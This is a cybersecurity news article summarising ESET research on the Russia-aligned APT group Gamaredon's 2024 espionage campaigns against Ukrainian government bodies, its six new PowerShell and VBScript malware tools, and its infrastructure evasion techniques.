Gamaredon Unleashes Six New Malware Tools for Stealth, Persistence, and Lateral Movement

Gamaredon, a Russia-aligned advanced persistent threat (APT) group attributed by Ukraine’s Security Service (SSU) to the FSB’s 18th Center of Information Security, has exclusively targeted Ukrainian governmental institutions throughout 2024, abandoning prior attempts to hit NATO countries.

According to ESET Research Report, which has closely tracked the group’s activities, this refocus aligns with Gamaredon’s long-standing cyberespionage objectives amid the ongoing Russia-Ukraine conflict.

Exclusive Focus on Ukraine Intensifies in 2024

The group’s operations have surged in intensity, with spearphishing campaigns growing in scale and frequency, particularly in the second half of the year.

These campaigns, often spanning one to five days, leverage malicious archives (RAR, ZIP, 7z) and XHTML files using HTML smuggling techniques to deliver HTA or LNK files that execute VBScript downloaders.

Notably, October 2024 saw Gamaredon experiment with malicious hyperlinks and innovative LNK files executing PowerShell commands via Cloudflare-hosted domains, bypassing traditional detection mechanisms.

Gamaredon’s technical arsenal in 2024 reflects a blend of innovation and refinement, introducing six new malware tools primarily built on PowerShell and VBScript, emphasizing stealth, persistence, and lateral movement.

Among these, PteroTickle, discovered in March, targets Python applications for lateral spread, while PteroGraphin, identified in August, uses encrypted channels via the Telegraph API for payload delivery.

Innovative Toolset Evolution

PteroBox, a November find, mirrors earlier tools but exfiltrates data to Dropbox with meticulous tracking to avoid redundant uploads.

Simultaneously, existing tools like PteroPSDoor and PteroLNK received significant upgrades, incorporating advanced obfuscation, registry-based storage, and WMI event subscriptions for stealthier file exfiltration and USB detection.

A peculiar payload in July, lacking espionage functions, instead opened a pro-Russian Telegram channel, hinting at Gamaredon’s occasional foray into propaganda dissemination.

On the infrastructure front, the group has almost entirely concealed its command-and-control (C&C) setup behind Cloudflare tunnels, reducing reliance on traditional domains to around 200 from over 500 in 2023, while exploiting third-party services like Telegram, Codeberg, and DNS-over-HTTPS (DoH) resolvers to evade network defenses.

Techniques such as fast-flux DNS, though scaled back, and novel execution of embedded scripts in temporary directories further complicate automated detection, showcasing Gamaredon’s persistent adaptability.

This relentless evolution, coupled with aggressive targeting of Ukraine, positions Gamaredon as a formidable cyberespionage threat.

As long as geopolitical tensions persist, ESET anticipates the group will continue refining its tactics, tools, and evasion strategies to sustain its operations against Ukrainian entities.

The detailed technical breakdown of these developments, as provided in ESET’s latest white paper, underscores the urgent need for robust cybersecurity measures to counter such sophisticated, state-aligned adversaries in an increasingly complex digital threatscape.

Exclusive Webinar Alert: Harnessing Intel® Processor Innovations for Advanced API Security – Register for Free